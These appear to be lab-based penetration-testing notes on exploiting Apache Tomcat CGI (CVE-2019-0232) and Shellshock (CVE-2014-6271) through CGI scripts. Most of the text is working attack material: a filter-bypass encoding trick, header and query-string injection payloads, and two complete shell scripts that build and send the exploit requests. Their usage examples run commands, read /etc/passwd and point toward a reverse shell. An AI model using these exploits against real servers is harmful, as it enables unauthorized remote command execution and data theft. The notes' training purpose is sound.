Tomcat CGI
CVE-2019-0232
Tomcat CGI versions vulnerable to remote command execution (the bug is Windows-only: it needs the CGI Servlet enabled with enableCmdLineArguments set to true, because the query string is handed to the script as command-line arguments):
- 9.0.0.M1 to 9.0.17
- 8.5.0 to 8.5.39
- 7.0.0 to 7.0.93
Steps to reproduce
Use nmap service/version detection to identify which Tomcat version is running on the server (the version shows up in the service banner on the Tomcat port).
Find the CGI script by fuzzing the cgi directory for .cmd and .bat files:
http://10.129.204.227:8080/cgi/FUZZ.cmd
http://10.129.204.227:8080/cgi/FUZZ.bat
Execute the command (the query string becomes the batch file's arguments, and the leading & makes cmd.exe run what follows as a second command; it executes with the privileges of the Tomcat service account):
http://10.129.204.227:8080/cgi/welcome.bat?&<command>
💡 Apache Tomcat introduced a patch that uses a regular expression to reject special characters in the arguments. However, the filter can be bypassed by URL-encoding the payload, so a full Windows path such as c:\windows\system32\whoami.exe is sent with its : and \ percent-encoded.
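The request shape above, as an added example (not code from the original notes or from Tomcat): a POSIX shell helper that percent-encodes the command argument as the tip describes and builds the welcome.bat URL. The CGI path and the lab host are the ones in the notes and are placeholders; the choice to leave the leading & literal and encode only the command is an assumption taken from the request shape shown above.

```shell
#!/usr/bin/env sh
# Added example, not part of the original notes. Builds the CVE-2019-0232 request
# with the command argument percent-encoded. Assumptions: CGI script at
# /cgi/welcome.bat on the lab host from the notes (both placeholders).

# Percent-encode every byte except RFC 3986 unreserved characters (A-Z a-z 0-9 - . _ ~),
# so the ':' and '\' of a Windows path never appear literally in the query string.
urlencode() {
  s="$1"
  out=""
  while [ -n "$s" ]; do
    c="${s%"${s#?}"}"   # first character of the remaining string
    s="${s#?}"          # everything after it
    case "$c" in
      [A-Za-z0-9._~-]) out="$out$c" ;;
      *) out="$out$(printf '%%%02X' "'$c")" ;;   # "'c" gives the byte value of c
    esac
  done
  printf '%s' "$out"
}

# The query string is passed to the .bat as command-line arguments; the leading '&'
# makes cmd.exe treat what follows as a second command. Only the command is encoded.
tomcat_cgi_url() {
  base="$1"   # e.g. http://10.129.204.227:8080/cgi/welcome.bat
  cmd="$2"    # e.g. c:\windows\system32\whoami.exe
  printf '%s?&%s' "$base" "$(urlencode "$cmd")"
}

# Send the request (needs network access to the target).
tomcat_cgi_exec() {
  curl -s "$(tomcat_cgi_url "$1" "$2")"
}

# Usage:
# tomcat_cgi_exec 'http://10.129.204.227:8080/cgi/welcome.bat' 'c:\windows\system32\whoami.exe'
```

Using the full path to the executable avoids depending on the PATH of the Tomcat service account; if the output does not come back in the body, check the script is really a .bat/.cmd and that the target is one of the versions listed above.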
Shellshock via CGI
Shellshock (CVE-2014-6271) is a security flaw in the Bash shell (GNU Bash up to version 4.3): bash imported function definitions from environment variables and kept parsing past the closing brace, so any command appended after the function body was executed. CGI scripts are exposed because the web server exports request headers as environment variables (User-Agent becomes HTTP_USER_AGENT), so a script run by bash, or one that spawns bash, executes the attacker's header.
Check if it is vulnerable (locally, on the shell you are testing):
$ env y='() { :;}; echo vulnerable-shellshock' bash -c "echo not vulnerable"
A vulnerable bash prints vulnerable-shellshock before not vulnerable; a patched bash prints only not vulnerable.
#Find the file
Intrusionz3r0@htb[/htb]$ ffuf -c -t 400 -w /usr/share/dirb/wordlists/common.txt -u http://10.129.205.27/cgi-bin/FUZZ.cgi
#Exploit vulnerability
Intrusionz3r0@htb[/htb]$ curl -H 'User-Agent: () { :; }; echo; COMMAND-HERE' http://10.129.205.27/cgi-bin/access.cgi
The echo before the command emits the blank line that terminates the CGI response headers, so the command output is returned in the response body instead of triggering a 500 from malformed headers. The command runs as the web server user.
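The check and the exploit request above, as an added example (not code from the original notes): a POSIX shell script with a local probe that mirrors the CGI mechanism by putting the payload in a variable named HTTP_USER_AGENT, and a function that sends the header with curl. The target URL is the lab address from the notes and is a placeholder; the variable name is an assumption chosen to match how a CGI gateway exports the User-Agent header.

```shell
#!/usr/bin/env sh
# Added example, not part of the original notes. Local Shellshock probe plus the
# CGI exploit request. Assumptions: lab URL from the notes is a placeholder;
# HTTP_USER_AGENT is used as the variable name only to mirror what a CGI gateway
# exports for the User-Agent header (bash does not care about the name).

# Prints "vulnerable" when the bash on PATH executes code appended to an exported
# function definition (CVE-2014-6271), "patched" otherwise, "no-bash" if there is
# no bash binary to test. Always returns 0 so it is safe under set -e.
shellshock_probe() {
  if ! command -v bash >/dev/null 2>&1; then
    printf 'no-bash'
    return 0
  fi
  # The function body is empty; the command after the closing brace is the payload.
  out=$(env HTTP_USER_AGENT='() { :; }; echo vulnerable-shellshock' bash -c 'echo done' 2>/dev/null)
  case "$out" in
    *vulnerable-shellshock*) printf 'vulnerable' ;;
    *) printf 'patched' ;;
  esac
  return 0
}

# Build the header: "echo" emits the blank line that ends the CGI response headers,
# so the command output lands in the HTTP body instead of breaking the response.
shellshock_header() {
  printf 'User-Agent: () { :; }; echo; %s' "$1"
}

# Send the exploit against a CGI script (needs network access to the target).
# The command runs as the web server user.
shellshock_exploit() {
  url="$1"
  cmd="$2"
  curl -s -H "$(shellshock_header "$cmd")" "$url"
}

# Usage:
# shellshock_probe; echo
# shellshock_exploit http://10.129.205.27/cgi-bin/access.cgi 'id'
# shellshock_exploit http://10.129.205.27/cgi-bin/access.cgi '/bin/bash -c "cat /etc/passwd"'
```

For a reverse shell, put the full interpreter path in the command (for example /bin/bash with -i) because the CGI environment usually has a minimal PATH; any header the gateway exports (Referer, Cookie) works as well as User-Agent.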